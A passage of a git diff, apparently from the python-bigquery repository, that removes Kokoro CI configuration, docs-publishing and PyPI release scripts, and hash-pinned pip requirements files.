--hash=sha256:1cee9ad369867bfdbbb48b7dd50374c0967a0bb7710050facf0dd6911440e3df \ - --hash=sha256:f8c5449b3cf0861679ce7e0503c7b44b5ec981bec0d1d3795a07f1ba96f0204d - # via requests -virtualenv==20.28.1 \ - --hash=sha256:412773c85d4dab0409b83ec36f7a6499e72eaf08c80e81e9576bca61831c71cb \ - --hash=sha256:5d34ab240fdb5d21549b76f9e8ff3af28252f5499fb6d6f031adac4e5a8c5329 - # via nox diff --git a/.kokoro/docs/common.cfg b/.kokoro/docs/common.cfg deleted file mode 100644 index 76ae5f13b..000000000 --- a/.kokoro/docs/common.cfg +++ /dev/null @@ -1,66 +0,0 @@ -# Format: //devtools/kokoro/config/proto/build.proto - -# Build logs will be here -action { - define_artifacts { - regex: "**/*sponge_log.xml" - } -} - -# Download trampoline resources. -gfile_resources: "/bigstore/cloud-devrel-kokoro-resources/trampoline" - -# Use the trampoline script to run in docker. -build_file: "python-bigquery/.kokoro/trampoline_v2.sh" - -# Configure the docker image for kokoro-trampoline. -env_vars: { - key: "TRAMPOLINE_IMAGE" - value: "gcr.io/cloud-devrel-kokoro-resources/python-lib-docs" -} -env_vars: { - key: "TRAMPOLINE_BUILD_FILE" - value: "github/python-bigquery/.kokoro/publish-docs.sh" -} - -env_vars: { - key: "STAGING_BUCKET" - value: "docs-staging" -} - -env_vars: { - key: "V2_STAGING_BUCKET" - # Push google cloud library docs to the Cloud RAD bucket `docs-staging-v2` - value: "docs-staging-v2" -} - -# It will upload the docker image after successful builds. -env_vars: { - key: "TRAMPOLINE_IMAGE_UPLOAD" - value: "true" -} - -# It will always build the docker image. -env_vars: { - key: "TRAMPOLINE_DOCKERFILE" - value: ".kokoro/docker/docs/Dockerfile" -} - -# Fetch the token needed for reporting release status to GitHub -before_action { - fetch_keystore { - keystore_resource { - keystore_config_id: 73713 - keyname: "yoshi-automation-github-key" - } - } -} - -before_action { - fetch_keystore { - keystore_resource { - keystore_config_id: 73713 - keyname: "docuploader_service_account" - } - } -} diff --git a/.kokoro/docs/docs-presubmit.cfg b/.kokoro/docs/docs-presubmit.cfg deleted file mode 100644 index 08adb2e28..000000000 --- a/.kokoro/docs/docs-presubmit.cfg +++ /dev/null @@ -1,28 +0,0 @@ -# Format: //devtools/kokoro/config/proto/build.proto - -env_vars: { - key: "STAGING_BUCKET" - value: "gcloud-python-test" -} - -env_vars: { - key: "V2_STAGING_BUCKET" - value: "gcloud-python-test" -} - -# We only upload the image in the main `docs` build. -env_vars: { - key: "TRAMPOLINE_IMAGE_UPLOAD" - value: "false" -} - -env_vars: { - key: "TRAMPOLINE_BUILD_FILE" - value: "github/python-bigquery/.kokoro/build.sh" -} - -# Only run this nox session. -env_vars: { - key: "NOX_SESSION" - value: "docs docfx" -} diff --git a/.kokoro/docs/docs.cfg b/.kokoro/docs/docs.cfg deleted file mode 100644 index 8f43917d9..000000000 --- a/.kokoro/docs/docs.cfg +++ /dev/null @@ -1 +0,0 @@ -# Format: //devtools/kokoro/config/proto/build.proto \ No newline at end of file diff --git a/.kokoro/publish-docs.sh b/.kokoro/publish-docs.sh deleted file mode 100755 index 4ed4aaf13..000000000 --- a/.kokoro/publish-docs.sh +++ /dev/null @@ -1,58 +0,0 @@ -#!/bin/bash -# Copyright 2024 Google LLC -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# https://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -set -eo pipefail - -# Disable buffering, so that the logs stream through. -export PYTHONUNBUFFERED=1 - -export PATH="${HOME}/.local/bin:${PATH}" - -# build docs -nox -s docs - -# create metadata -python3.10 -m docuploader create-metadata \ - --name=$(jq --raw-output '.name // empty' .repo-metadata.json) \ - --version=$(python3.10 setup.py --version) \ - --language=$(jq --raw-output '.language // empty' .repo-metadata.json) \ - --distribution-name=$(python3.10 setup.py --name) \ - --product-page=$(jq --raw-output '.product_documentation // empty' .repo-metadata.json) \ - --github-repository=$(jq --raw-output '.repo // empty' .repo-metadata.json) \ - --issue-tracker=$(jq --raw-output '.issue_tracker // empty' .repo-metadata.json) - -cat docs.metadata - -# upload docs -python3.10 -m docuploader upload docs/_build/html --metadata-file docs.metadata --staging-bucket "${STAGING_BUCKET}" - - -# docfx yaml files -nox -s docfx - -# create metadata. -python3.10 -m docuploader create-metadata \ - --name=$(jq --raw-output '.name // empty' .repo-metadata.json) \ - --version=$(python3.10 setup.py --version) \ - --language=$(jq --raw-output '.language // empty' .repo-metadata.json) \ - --distribution-name=$(python3.10 setup.py --name) \ - --product-page=$(jq --raw-output '.product_documentation // empty' .repo-metadata.json) \ - --github-repository=$(jq --raw-output '.repo // empty' .repo-metadata.json) \ - --issue-tracker=$(jq --raw-output '.issue_tracker // empty' .repo-metadata.json) - -cat docs.metadata - -# upload docs -python3.10 -m docuploader upload docs/_build/html/docfx_yaml --metadata-file docs.metadata --destination-prefix docfx --staging-bucket "${V2_STAGING_BUCKET}" diff --git a/.kokoro/release.sh b/.kokoro/release.sh deleted file mode 100755 index 65deb5ed3..000000000 --- a/.kokoro/release.sh +++ /dev/null @@ -1,29 +0,0 @@ -#!/bin/bash -# Copyright 2024 Google LLC -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# https://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -set -eo pipefail - -# Start the releasetool reporter -python3 -m pip install --require-hashes -r github/python-bigquery/.kokoro/requirements.txt -python3 -m releasetool publish-reporter-script > /tmp/publisher-script; source /tmp/publisher-script - -# Disable buffering, so that the logs stream through. -export PYTHONUNBUFFERED=1 - -# Move into the package, build the distribution and upload. -TWINE_PASSWORD=$(cat "${KOKORO_KEYSTORE_DIR}/73713_google-cloud-pypi-token-keystore-3") -cd github/python-bigquery -python3 setup.py sdist bdist_wheel -twine upload --username __token__ --password "${TWINE_PASSWORD}" dist/* diff --git a/.kokoro/release/common.cfg b/.kokoro/release/common.cfg deleted file mode 100644 index 6f57163f5..000000000 --- a/.kokoro/release/common.cfg +++ /dev/null @@ -1,43 +0,0 @@ -# Format: //devtools/kokoro/config/proto/build.proto - -# Build logs will be here -action { - define_artifacts { - regex: "**/*sponge_log.xml" - } -} - -# Download trampoline resources. -gfile_resources: "/bigstore/cloud-devrel-kokoro-resources/trampoline" - -# Use the trampoline script to run in docker. -build_file: "python-bigquery/.kokoro/trampoline.sh" - -# Configure the docker image for kokoro-trampoline. -env_vars: { - key: "TRAMPOLINE_IMAGE" - value: "gcr.io/cloud-devrel-kokoro-resources/python-multi" -} -env_vars: { - key: "TRAMPOLINE_BUILD_FILE" - value: "github/python-bigquery/.kokoro/release.sh" -} - -# Fetch PyPI password -before_action { - fetch_keystore { - keystore_resource { - keystore_config_id: 73713 - keyname: "google-cloud-pypi-token-keystore-3" - } - } -} - -# Store the packages we uploaded to PyPI. That way, we have a record of exactly -# what we published, which we can use to generate SBOMs and attestations. -action { - define_artifacts { - regex: "github/python-bigquery/**/*.tar.gz" - strip_prefix: "github/python-bigquery" - } -} diff --git a/.kokoro/release/release.cfg b/.kokoro/release/release.cfg deleted file mode 100644 index 8f43917d9..000000000 --- a/.kokoro/release/release.cfg +++ /dev/null @@ -1 +0,0 @@ -# Format: //devtools/kokoro/config/proto/build.proto \ No newline at end of file diff --git a/.kokoro/requirements.in b/.kokoro/requirements.in deleted file mode 100644 index fff4d9ce0..000000000 --- a/.kokoro/requirements.in +++ /dev/null @@ -1,11 +0,0 @@ -gcp-docuploader -gcp-releasetool>=2 # required for compatibility with cryptography>=42.x -importlib-metadata -typing-extensions -twine -wheel -setuptools -nox>=2022.11.21 # required to remove dependency on py -charset-normalizer<3 -click<8.1.0 -cryptography>=42.0.5 diff --git a/.kokoro/requirements.txt b/.kokoro/requirements.txt deleted file mode 100644 index 6ad95a04a..000000000 --- a/.kokoro/requirements.txt +++ /dev/null @@ -1,513 +0,0 @@ -# -# This file is autogenerated by pip-compile with Python 3.9 -# by the following command: -# -# pip-compile --allow-unsafe --generate-hashes requirements.in -# -argcomplete==3.5.1 \ - --hash=sha256:1a1d148bdaa3e3b93454900163403df41448a248af01b6e849edc5ac08e6c363 \ - --hash=sha256:eb1ee355aa2557bd3d0145de7b06b2a45b0ce461e1e7813f5d066039ab4177b4 - # via nox -attrs==24.2.0 \ - --hash=sha256:5cfb1b9148b5b086569baec03f20d7b6bf3bcacc9a42bebf87ffaaca362f6346 \ - --hash=sha256:81921eb96de3191c8258c199618104dd27ac608d9366f5e35d011eae1867ede2 - # via gcp-releasetool -backports-tarfile==1.2.0 \ - --hash=sha256:77e284d754527b01fb1e6fa8a1afe577858ebe4e9dad8919e34c862cb399bc34 \ - --hash=sha256:d75e02c268746e1b8144c278978b6e98e85de6ad16f8e4b0844a154557eca991 - # via jaraco-context -cachetools==5.5.0 \ - --hash=sha256:02134e8439cdc2ffb62023ce1debca2944c3f289d66bb17ead3ab3dede74b292 \ - --hash=sha256:2cc24fb4cbe39633fb7badd9db9ca6295d766d9c2995f245725a46715d050f2a - # via google-auth -certifi==2024.8.30 \ - --hash=sha256:922820b53db7a7257ffbda3f597266d435245903d80737e34f8a45ff3e3230d8 \ - --hash=sha256:bec941d2aa8195e248a60b31ff9f0558284cf01a52591ceda73ea9afffd69fd9 - # via requests -cffi==1.17.1 \ - --hash=sha256:045d61c734659cc045141be4bae381a41d89b741f795af1dd018bfb532fd0df8 \ - --hash=sha256:0984a4925a435b1da406122d4d7968dd861c1385afe3b45ba82b750f229811e2 \ - --hash=sha256:0e2b1fac190ae3ebfe37b979cc1ce69c81f4e4fe5746bb401dca63a9062cdaf1 \ - --hash=sha256:0f048dcf80db46f0098ccac01132761580d28e28bc0f78ae0d58048063317e15 \ - --hash=sha256:1257bdabf294dceb59f5e70c64a3e2f462c30c7ad68092d01bbbfb1c16b1ba36 \ - --hash=sha256:1c39c6016c32bc48dd54561950ebd6836e1670f2ae46128f67cf49e789c52824 \ - --hash=sha256:1d599671f396c4723d016dbddb72fe8e0397082b0a77a4fab8028923bec050e8 \ - --hash=sha256:28b16024becceed8c6dfbc75629e27788d8a3f9030691a1dbf9821a128b22c36 \ - --hash=sha256:2bb1a08b8008b281856e5971307cc386a8e9c5b625ac297e853d36da6efe9c17 \ - --hash=sha256:30c5e0cb5ae493c04c8b42916e52ca38079f1b235c2f8ae5f4527b963c401caf \ - --hash=sha256:31000ec67d4221a71bd3f67df918b1f88f676f1c3b535a7eb473255fdc0b83fc \ - --hash=sha256:386c8bf53c502fff58903061338ce4f4950cbdcb23e2902d86c0f722b786bbe3 \ - --hash=sha256:3edc8d958eb099c634dace3c7e16560ae474aa3803a5df240542b305d14e14ed \ - --hash=sha256:45398b671ac6d70e67da8e4224a065cec6a93541bb7aebe1b198a61b58c7b702 \ - --hash=sha256:46bf43160c1a35f7ec506d254e5c890f3c03648a4dbac12d624e4490a7046cd1 \ - --hash=sha256:4ceb10419a9adf4460ea14cfd6bc43d08701f0835e979bf821052f1805850fe8 \ - --hash=sha256:51392eae71afec0d0c8fb1a53b204dbb3bcabcb3c9b807eedf3e1e6ccf2de903 \ - --hash=sha256:5da5719280082ac6bd9aa7becb3938dc9f9cbd57fac7d2871717b1feb0902ab6 \ - --hash=sha256:610faea79c43e44c71e1ec53a554553fa22321b65fae24889706c0a84d4ad86d \ - --hash=sha256:636062ea65bd0195bc012fea9321aca499c0504409f413dc88af450b57ffd03b \ - --hash=sha256:6883e737d7d9e4899a8a695e00ec36bd4e5e4f18fabe0aca0efe0a4b44cdb13e \ - --hash=sha256:6b8b4a92e1c65048ff98cfe1f735ef8f1ceb72e3d5f0c25fdb12087a23da22be \ - --hash=sha256:6f17be4345073b0a7b8ea599688f692ac3ef23ce28e5df79c04de519dbc4912c \ - --hash=sha256:706510fe141c86a69c8ddc029c7910003a17353970cff3b904ff0686a5927683 \ - --hash=sha256:72e72408cad3d5419375fc87d289076ee319835bdfa2caad331e377589aebba9 \ - --hash=sha256:733e99bc2df47476e3848417c5a4540522f234dfd4ef3ab7fafdf555b082ec0c \ - --hash=sha256:7596d6620d3fa590f677e9ee430df2958d2d6d6de2feeae5b20e82c00b76fbf8 \ - --hash=sha256:78122be759c3f8a014ce010908ae03364d00a1f81ab5c7f4a7a5120607ea56e1 \ - --hash=sha256:805b4371bf7197c329fcb3ead37e710d1bca9da5d583f5073b799d5c5bd1eee4 \ - --hash=sha256:85a950a4ac9c359340d5963966e3e0a94a676bd6245a4b55bc43949eee26a655 \ - --hash=sha256:8f2cdc858323644ab277e9bb925ad72ae0e67f69e804f4898c070998d50b1a67 \ - --hash=sha256:9755e4345d1ec879e3849e62222a18c7174d65a6a92d5b346b1863912168b595 \ - --hash=sha256:98e3969bcff97cae1b2def8ba499ea3d6f31ddfdb7635374834cf89a1a08ecf0 \ - --hash=sha256:a08d7e755f8ed21095a310a693525137cfe756ce62d066e53f502a83dc550f65 \ - --hash=sha256:a1ed2dd2972641495a3ec98445e09766f077aee98a1c896dcb4ad0d303628e41 \ - --hash=sha256:a24ed04c8ffd54b0729c07cee15a81d964e6fee0e3d4d342a27b020d22959dc6 \ - --hash=sha256:a45e3c6913c5b87b3ff120dcdc03f6131fa0065027d0ed7ee6190736a74cd401 \ - --hash=sha256:a9b15d491f3ad5d692e11f6b71f7857e7835eb677955c00cc0aefcd0669adaf6 \ - --hash=sha256:ad9413ccdeda48c5afdae7e4fa2192157e991ff761e7ab8fdd8926f40b160cc3 \ - --hash=sha256:b2ab587605f4ba0bf81dc0cb08a41bd1c0a5906bd59243d56bad7668a6fc6c16 \ - --hash=sha256:b62ce867176a75d03a665bad002af8e6d54644fad99a3c70905c543130e39d93 \ - --hash=sha256:c03e868a0b3bc35839ba98e74211ed2b05d2119be4e8a0f224fba9384f1fe02e \ - --hash=sha256:c59d6e989d07460165cc5ad3c61f9fd8f1b4796eacbd81cee78957842b834af4 \ - --hash=sha256:c7eac2ef9b63c79431bc4b25f1cd649d7f061a28808cbc6c47b534bd789ef964 \ - --hash=sha256:c9c3d058ebabb74db66e431095118094d06abf53284d9c81f27300d0e0d8bc7c \ - --hash=sha256:ca74b8dbe6e8e8263c0ffd60277de77dcee6c837a3d0881d8c1ead7268c9e576 \ - --hash=sha256:caaf0640ef5f5517f49bc275eca1406b0ffa6aa184892812030f04c2abf589a0 \ - --hash=sha256:cdf5ce3acdfd1661132f2a9c19cac174758dc2352bfe37d98aa7512c6b7178b3 \ - --hash=sha256:d016c76bdd850f3c626af19b0542c9677ba156e4ee4fccfdd7848803533ef662 \ - --hash=sha256:d01b12eeeb4427d3110de311e1774046ad344f5b1a7403101878976ecd7a10f3 \ - --hash=sha256:d63afe322132c194cf832bfec0dc69a99fb9bb6bbd550f161a49e9e855cc78ff \ - --hash=sha256:da95af8214998d77a98cc14e3a3bd00aa191526343078b530ceb0bd710fb48a5 \ - --hash=sha256:dd398dbc6773384a17fe0d3e7eeb8d1a21c2200473ee6806bb5e6a8e62bb73dd \ - --hash=sha256:de2ea4b5833625383e464549fec1bc395c1bdeeb5f25c4a3a82b5a8c756ec22f \ - --hash=sha256:de55b766c7aa2e2a3092c51e0483d700341182f08e67c63630d5b6f200bb28e5 \ - --hash=sha256:df8b1c11f177bc2313ec4b2d46baec87a5f3e71fc8b45dab2ee7cae86d9aba14 \ - --hash=sha256:e03eab0a8677fa80d646b5ddece1cbeaf556c313dcfac435ba11f107ba117b5d \ - --hash=sha256:e221cf152cff04059d011ee126477f0d9588303eb57e88923578ace7baad17f9 \ - --hash=sha256:e31ae45bc2e29f6b2abd0de1cc3b9d5205aa847cafaecb8af1476a609a2f6eb7 \ - --hash=sha256:edae79245293e15384b51f88b00613ba9f7198016a5948b5dddf4917d4d26382 \ - --hash=sha256:f1e22e8c4419538cb197e4dd60acc919d7696e5ef98ee4da4e01d3f8cfa4cc5a \ - --hash=sha256:f3a2b4222ce6b60e2e8b337bb9596923045681d71e5a082783484d845390938e \ - --hash=sha256:f6a16c31041f09ead72d69f583767292f750d24913dadacf5756b966aacb3f1a \ - --hash=sha256:f75c7ab1f9e4aca5414ed4d8e5c0e303a34f4421f8a0d47a4d019ceff0ab6af4 \ - --hash=sha256:f79fc4fc25f1c8698ff97788206bb3c2598949bfe0fef03d299eb1b5356ada99 \ - --hash=sha256:f7f5baafcc48261359e14bcd6d9bff6d4b28d9103847c9e136694cb0501aef87 \ - --hash=sha256:fc48c783f9c87e60831201f2cce7f3b2e4846bf4d8728eabe54d60700b318a0b - # via cryptography -charset-normalizer==2.1.1 \ - --hash=sha256:5a3d016c7c547f69d6f81fb0db9449ce888b418b5b9952cc5e6e66843e9dd845 \ - --hash=sha256:83e9a75d1911279afd89352c68b45348559d1fc0506b054b346651b5e7fee29f - # via - # -r requirements.in - # requests -click==8.0.4 \ - --hash=sha256:6a7a62563bbfabfda3a38f3023a1db4a35978c0abd76f6c9605ecd6554d6d9b1 \ - --hash=sha256:8458d7b1287c5fb128c90e23381cf99dcde74beaf6c7ff6384ce84d6fe090adb - # via - # -r requirements.in - # gcp-docuploader - # gcp-releasetool -colorlog==6.8.2 \ - --hash=sha256:3e3e079a41feb5a1b64f978b5ea4f46040a94f11f0e8bbb8261e3dbbeca64d44 \ - --hash=sha256:4dcbb62368e2800cb3c5abd348da7e53f6c362dda502ec27c560b2e58a66bd33 - # via - # gcp-docuploader - # nox -cryptography==44.0.1 \ - --hash=sha256:00918d859aa4e57db8299607086f793fa7813ae2ff5a4637e318a25ef82730f7 \ - --hash=sha256:1e8d181e90a777b63f3f0caa836844a1182f1f265687fac2115fcf245f5fbec3 \ - --hash=sha256:1f9a92144fa0c877117e9748c74501bea842f93d21ee00b0cf922846d9d0b183 \ - --hash=sha256:21377472ca4ada2906bc313168c9dc7b1d7ca417b63c1c3011d0c74b7de9ae69 \ - --hash=sha256:24979e9f2040c953a94bf3c6782e67795a4c260734e5264dceea65c8f4bae64a \ - --hash=sha256:2a46a89ad3e6176223b632056f321bc7de36b9f9b93b2cc1cccf935a3849dc62 \ - --hash=sha256:322eb03ecc62784536bc173f1483e76747aafeb69c8728df48537eb431cd1911 \ - --hash=sha256:436df4f203482f41aad60ed1813811ac4ab102765ecae7a2bbb1dbb66dcff5a7 \ - --hash=sha256:4f422e8c6a28cf8b7f883eb790695d6d45b0c385a2583073f3cec434cc705e1a \ - --hash=sha256:53f23339864b617a3dfc2b0ac8d5c432625c80014c25caac9082314e9de56f41 \ - --hash=sha256:5fed5cd6102bb4eb843e3315d2bf25fede494509bddadb81e03a859c1bc17b83 \ - --hash=sha256:610a83540765a8d8ce0f351ce42e26e53e1f774a6efb71eb1b41eb01d01c3d12 \ - --hash=sha256:6c8acf6f3d1f47acb2248ec3ea261171a671f3d9428e34ad0357148d492c7864 \ - --hash=sha256:6f76fdd6fd048576a04c5210d53aa04ca34d2ed63336d4abd306d0cbe298fddf \ - --hash=sha256:72198e2b5925155497a5a3e8c216c7fb3e64c16ccee11f0e7da272fa93b35c4c \ - --hash=sha256:887143b9ff6bad2b7570da75a7fe8bbf5f65276365ac259a5d2d5147a73775f2 \ - --hash=sha256:888fcc3fce0c888785a4876ca55f9f43787f4c5c1cc1e2e0da71ad481ff82c5b \ - --hash=sha256:8e6a85a93d0642bd774460a86513c5d9d80b5c002ca9693e63f6e540f1815ed0 \ - --hash=sha256:94f99f2b943b354a5b6307d7e8d19f5c423a794462bde2bf310c770ba052b1c4 \ - --hash=sha256:9b336599e2cb77b1008cb2ac264b290803ec5e8e89d618a5e978ff5eb6f715d9 \ - --hash=sha256:a2d8a7045e1ab9b9f803f0d9531ead85f90c5f2859e653b61497228b18452008 \ - --hash=sha256:b8272f257cf1cbd3f2e120f14c68bff2b6bdfcc157fafdee84a1b795efd72862 \ - --hash=sha256:bf688f615c29bfe9dfc44312ca470989279f0e94bb9f631f85e3459af8efc009 \ - --hash=sha256:d9c5b9f698a83c8bd71e0f4d3f9f839ef244798e5ffe96febfa9714717db7af7 \ - --hash=sha256:dd7c7e2d71d908dc0f8d2027e1604102140d84b155e658c20e8ad1304317691f \ - --hash=sha256:df978682c1504fc93b3209de21aeabf2375cb1571d4e61907b3e7a2540e83026 \ - --hash=sha256:e403f7f766ded778ecdb790da786b418a9f2394f36e8cc8b796cc056ab05f44f \ - --hash=sha256:eb3889330f2a4a148abead555399ec9a32b13b7c8ba969b72d8e500eb7ef84cd \ - --hash=sha256:f4daefc971c2d1f82f03097dc6f216744a6cd2ac0f04c68fb935ea2ba2a0d420 \ - --hash=sha256:f51f5705ab27898afda1aaa430f34ad90dc117421057782022edf0600bec5f14 \ - --hash=sha256:fd0ee90072861e276b0ff08bd627abec29e32a53b2be44e41dbcdf87cbee2b00 - # via - # -r requirements.in - # gcp-releasetool - # secretstorage -distlib==0.3.9 \ - --hash=sha256:47f8c22fd27c27e25a65601af709b38e4f0a45ea4fc2e710f65755fa8caaaf87 \ - --hash=sha256:a60f20dea646b8a33f3e7772f74dc0b2d0772d2837ee1342a00645c81edf9403 - # via virtualenv -docutils==0.21.2 \ - --hash=sha256:3a6b18732edf182daa3cd12775bbb338cf5691468f91eeeb109deff6ebfa986f \ - --hash=sha256:dafca5b9e384f0e419294eb4d2ff9fa826435bf15f15b7bd45723e8ad76811b2 - # via readme-renderer -filelock==3.16.1 \ - --hash=sha256:2082e5703d51fbf98ea75855d9d5527e33d8ff23099bec374a134febee6946b0 \ - --hash=sha256:c249fbfcd5db47e5e2d6d62198e565475ee65e4831e2561c8e313fa7eb961435 - # via virtualenv -gcp-docuploader==0.6.5 \ - --hash=sha256:30221d4ac3e5a2b9c69aa52fdbef68cc3f27d0e6d0d90e220fc024584b8d2318 \ - --hash=sha256:b7458ef93f605b9d46a4bf3a8dc1755dad1f31d030c8679edf304e343b347eea - # via -r requirements.in -gcp-releasetool==2.1.1 \ - --hash=sha256:25639269f4eae510094f9dbed9894977e1966933211eb155a451deebc3fc0b30 \ - --hash=sha256:845f4ded3d9bfe8cc7fdaad789e83f4ea014affa77785259a7ddac4b243e099e - # via -r requirements.in -google-api-core==2.21.0 \ - --hash=sha256:4a152fd11a9f774ea606388d423b68aa7e6d6a0ffe4c8266f74979613ec09f81 \ - --hash=sha256:6869eacb2a37720380ba5898312af79a4d30b8bca1548fb4093e0697dc4bdf5d - # via - # google-cloud-core - # google-cloud-storage -google-auth==2.35.0 \ - --hash=sha256:25df55f327ef021de8be50bad0dfd4a916ad0de96da86cd05661c9297723ad3f \ - --hash=sha256:f4c64ed4e01e8e8b646ef34c018f8bf3338df0c8e37d8b3bba40e7f574a3278a - # via - # gcp-releasetool - # google-api-core - # google-cloud-core - # google-cloud-storage -google-cloud-core==2.4.1 \ - --hash=sha256:9b7749272a812bde58fff28868d0c5e2f585b82f37e09a1f6ed2d4d10f134073 \ - --hash=sha256:a9e6a4422b9ac5c29f79a0ede9485473338e2ce78d91f2370c01e730eab22e61 - # via google-cloud-storage -google-cloud-storage==2.18.2 \ - --hash=sha256:97a4d45c368b7d401ed48c4fdfe86e1e1cb96401c9e199e419d289e2c0370166 \ - --hash=sha256:aaf7acd70cdad9f274d29332673fcab98708d0e1f4dceb5a5356aaef06af4d99 - # via gcp-docuploader -google-crc32c==1.6.0 \ - --hash=sha256:05e2d8c9a2f853ff116db9706b4a27350587f341eda835f46db3c0a8c8ce2f24 \ - --hash=sha256:18e311c64008f1f1379158158bb3f0c8d72635b9eb4f9545f8cf990c5668e59d \ - --hash=sha256:236c87a46cdf06384f614e9092b82c05f81bd34b80248021f729396a78e55d7e \ - --hash=sha256:35834855408429cecf495cac67ccbab802de269e948e27478b1e47dfb6465e57 \ - --hash=sha256:386122eeaaa76951a8196310432c5b0ef3b53590ef4c317ec7588ec554fec5d2 \ - --hash=sha256:40b05ab32a5067525670880eb5d169529089a26fe35dce8891127aeddc1950e8 \ - --hash=sha256:48abd62ca76a2cbe034542ed1b6aee851b6f28aaca4e6551b5599b6f3ef175cc \ - --hash=sha256:50cf2a96da226dcbff8671233ecf37bf6e95de98b2a2ebadbfdf455e6d05df42 \ - --hash=sha256:51c4f54dd8c6dfeb58d1df5e4f7f97df8abf17a36626a217f169893d1d7f3e9f \ - --hash=sha256:5bcc90b34df28a4b38653c36bb5ada35671ad105c99cfe915fb5bed7ad6924aa \ - --hash=sha256:62f6d4a29fea082ac4a3c9be5e415218255cf11684ac6ef5488eea0c9132689b \ - --hash=sha256:6eceb6ad197656a1ff49ebfbbfa870678c75be4344feb35ac1edf694309413dc \ - --hash=sha256:7aec8e88a3583515f9e0957fe4f5f6d8d4997e36d0f61624e70469771584c760 \ - --hash=sha256:91ca8145b060679ec9176e6de4f89b07363d6805bd4760631ef254905503598d \ - --hash=sha256:a184243544811e4a50d345838a883733461e67578959ac59964e43cca2c791e7 \ - --hash=sha256:a9e4b426c3702f3cd23b933436487eb34e01e00327fac20c9aebb68ccf34117d \ - --hash=sha256:bb0966e1c50d0ef5bc743312cc730b533491d60585a9a08f897274e57c3f70e0 \ - --hash=sha256:bb8b3c75bd157010459b15222c3fd30577042a7060e29d42dabce449c087f2b3 \ - --hash=sha256:bd5e7d2445d1a958c266bfa5d04c39932dc54093fa391736dbfdb0f1929c1fb3 \ - --hash=sha256:c87d98c7c4a69066fd31701c4e10d178a648c2cac3452e62c6b24dc51f9fcc00 \ - --hash=sha256:d2952396dc604544ea7476b33fe87faedc24d666fb0c2d5ac971a2b9576ab871 \ - --hash=sha256:d8797406499f28b5ef791f339594b0b5fdedf54e203b5066675c406ba69d705c \ - --hash=sha256:d9e9913f7bd69e093b81da4535ce27af842e7bf371cde42d1ae9e9bd382dc0e9 \ - --hash=sha256:e2806553238cd076f0a55bddab37a532b53580e699ed8e5606d0de1f856b5205 \ - --hash=sha256:ebab974b1687509e5c973b5c4b8b146683e101e102e17a86bd196ecaa4d099fc \ - --hash=sha256:ed767bf4ba90104c1216b68111613f0d5926fb3780660ea1198fc469af410e9d \ - --hash=sha256:f7a1fc29803712f80879b0806cb83ab24ce62fc8daf0569f2204a0cfd7f68ed4 - # via - # google-cloud-storage - # google-resumable-media -google-resumable-media==2.7.2 \ - --hash=sha256:3ce7551e9fe6d99e9a126101d2536612bb73486721951e9562fee0f90c6ababa \ - --hash=sha256:5280aed4629f2b60b847b0d42f9857fd4935c11af266744df33d8074cae92fe0 - # via google-cloud-storage -googleapis-common-protos==1.65.0 \ - --hash=sha256:2972e6c496f435b92590fd54045060867f3fe9be2c82ab148fc8885035479a63 \ - --hash=sha256:334a29d07cddc3aa01dee4988f9afd9b2916ee2ff49d6b757155dc0d197852c0 - # via google-api-core -idna==3.10 \ - --hash=sha256:12f65c9b470abda6dc35cf8e63cc574b1c52b11df2c86030af0ac09b01b13ea9 \ - --hash=sha256:946d195a0d259cbba61165e88e65941f16e9b36ea6ddb97f00452bae8b1287d3 - # via requests -importlib-metadata==8.5.0 \ - --hash=sha256:45e54197d28b7a7f1559e60b95e7c567032b602131fbd588f1497f47880aa68b \ - --hash=sha256:71522656f0abace1d072b9e5481a48f07c138e00f079c38c8f883823f9c26bd7 - # via - # -r requirements.in - # keyring - # twine -jaraco-classes==3.4.0 \ - --hash=sha256:47a024b51d0239c0dd8c8540c6c7f484be3b8fcf0b2d85c13825780d3b3f3acd \ - --hash=sha256:f662826b6bed8cace05e7ff873ce0f9283b5c924470fe664fff1c2f00f581790 - # via keyring -jaraco-context==6.0.1 \ - --hash=sha256:9bae4ea555cf0b14938dc0aee7c9f32ed303aa20a3b73e7dc80111628792d1b3 \ - --hash=sha256:f797fc481b490edb305122c9181830a3a5b76d84ef6d1aef2fb9b47ab956f9e4 - # via keyring -jaraco-functools==4.1.0 \ - --hash=sha256:70f7e0e2ae076498e212562325e805204fc092d7b4c17e0e86c959e249701a9d \ - --hash=sha256:ad159f13428bc4acbf5541ad6dec511f91573b90fba04df61dafa2a1231cf649 - # via keyring -jeepney==0.8.0 \ - --hash=sha256:5efe48d255973902f6badc3ce55e2aa6c5c3b3bc642059ef3a91247bcfcc5806 \ - --hash=sha256:c0a454ad016ca575060802ee4d590dd912e35c122fa04e70306de3d076cce755 - # via - # keyring - # secretstorage -jinja2==3.1.5 \ - --hash=sha256:8fefff8dc3034e27bb80d67c671eb8a9bc424c0ef4c0826edbff304cceff43bb \ - --hash=sha256:aba0f4dc9ed8013c424088f68a5c226f7d6097ed89b246d7749c2ec4175c6adb - # via gcp-releasetool -keyring==25.4.1 \ - --hash=sha256:5426f817cf7f6f007ba5ec722b1bcad95a75b27d780343772ad76b17cb47b0bf \ - --hash=sha256:b07ebc55f3e8ed86ac81dd31ef14e81ace9dd9c3d4b5d77a6e9a2016d0d71a1b - # via - # gcp-releasetool - # twine -markdown-it-py==3.0.0 \ - --hash=sha256:355216845c60bd96232cd8d8c40e8f9765cc86f46880e43a8fd22dc1a1a8cab1 \ - --hash=sha256:e3f60a94fa066dc52ec76661e37c851cb232d92f9886b15cb560aaada2df8feb - # via rich -markupsafe==3.0.1 \ - --hash=sha256:0778de17cff1acaeccc3ff30cd99a3fd5c50fc58ad3d6c0e0c4c58092b859396 \ - --hash=sha256:0f84af7e813784feb4d5e4ff7db633aba6c8ca64a833f61d8e4eade234ef0c38 \ - --hash=sha256:17b2aea42a7280db02ac644db1d634ad47dcc96faf38ab304fe26ba2680d359a \ - 